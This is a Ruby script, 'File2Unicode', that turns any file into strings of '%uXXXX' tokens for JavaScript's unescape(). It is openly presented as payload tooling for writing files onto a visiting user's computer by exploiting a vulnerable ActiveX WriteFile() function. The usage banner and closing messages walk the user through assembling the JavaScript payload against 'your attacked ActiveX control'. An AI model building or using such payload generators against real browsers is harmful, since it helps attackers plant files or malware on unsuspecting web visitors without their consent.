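#!/usr/bin/env ruby

# Name: File2Unicode
# Author: SkyOut
# Date: November 2008
# Website: http://wired-security.net/
# Used Ruby Version: 1.8.6
# Tested on: OpenBSD 4.4

# This script generates Unicode bytes, that
# can be used through JavaScript's unescape()
# function to write files to the computer of
# the visiting user.

# Requirements: Find a bug in an ActiveX control,
# that has something like a vulnerable WriteFile()
# function...

# Usage: ruby file2unicode.rb [input] [output]

# Implementation notes:
# - The input is read and converted in-process. Earlier revisions ran
#   `hexdump <input> > tmp` through a shell, so a file name containing shell
#   metacharacters was executed as a command, and a fixed "tmp" file in the
#   working directory was overwritten and left behind.
# - hexdump's default output collapses repeated rows into a single "*" line;
#   rows handled that way were silently missing from the output. Reading the
#   bytes directly emits every row.
# - The output file is opened only after the input has been validated, so a
#   bad input path no longer truncates an existing output file.
# - Long runs of "%uXXXX" literals passed to unescape() are a commonly matched
#   indicator in web-content scanning; output of this script looks exactly
#   like that.

BYTES_PER_ROW = 16 # same row width as hexdump's default format
WORDS_PER_ROW = BYTES_PER_ROW / 2

# Formats one chunk of raw bytes (at most BYTES_PER_ROW) as a quoted string
# of "%uXXXX" tokens.
#
# The bytes are grouped into 16-bit words in native byte order, which is what
# hexdump's default format prints; a trailing odd byte is zero-padded, again
# as hexdump does. A full row gets a trailing " +" so that consecutive rows
# concatenate as JavaScript string literals; a short (final) row does not.
# NOTE: when the input size is an exact multiple of BYTES_PER_ROW the last
# row is a full row and therefore still ends in " +" (unchanged behaviour).
def unicode_row(chunk)
  padded = chunk.length.odd? ? chunk + "\0" : chunk
  words = padded.unpack("S*")
  row = "\"" + words.map { |word| format("%%u%04x", word) }.join + "\""
  row += " +" if words.length == WORDS_PER_ROW
  row
end

# Prints a message followed by "Quitting..." and terminates the script.
# Exit status stays 0, as in the original, so existing callers see no change.
def quit_with(message = nil)
  puts message if message
  puts "Quitting..."
  exit(0)
end

input = ARGV[0]
output = ARGV[1]

if input.nil? || output.nil?
  puts [
    "",
    "---------------------------------------------------------------",
    "||| File2Unicode |||",
    "||| This script will convert any file into a series of |||",
    "||| unicode bytes, that you can use as some payload through |||",
    "||| JavaScript. |||",
    "||| For example: Exploting an ActiveX control... |||",
    "---------------------------------------------------------------",
    "||| Author: SkyOut |||",
    "||| Date: November 2008 |||",
    "||| Website: http://wired-security.net/ |||",
    "---------------------------------------------------------------",
    "",
    "Usage: ruby file2unicode.rb [input] [output]",
    ""
  ]
  exit(0)
end

# Validate the input before touching the output file.
quit_with("The file \"#{input}\" does not exist!") unless File.exist?(input)

if File.exist?(output)
  puts "The file \"#{output}\" exists!"
  puts "Do you want to overwrite it? (yes/no)"
  # gets returns nil on EOF (e.g. stdin closed); treat that as an invalid answer.
  answer = STDIN.gets.to_s.chomp
  case answer
  when "no"
    quit_with
  when "yes"
    unless File.writable?(output)
      quit_with("You do not have permissions to write to \"#{output}\"!")
    end
  else
    quit_with("Your answer was incorrect! \"yes\" or \"no\" is accepted!")
  end
end

# Block forms close both handles even if the conversion raises.
File.open(input, "rb") do |src|
  File.open(output, "w") do |out|
    while (chunk = src.read(BYTES_PER_ROW))
      out.puts unicode_row(chunk)
    end
  end
end

puts ""
puts "Script execution finished!"
puts "Input was: #{input}"
puts "Output is: #{output}"
puts ""
puts "Now build a JavaScript code like this:"
puts "var MyFile = unescape(\"%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX\" +"
puts " \"%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX\" +"
puts " \"%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX\" +"
puts " . . . . . . . ."
puts " . . . . . . . ."
puts " . . . . . . . ."
puts " \"%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX\")"
puts ""
puts "The rest depends on your attacked ActiveX control"
puts "or whatever else you are targeting!"
puts ""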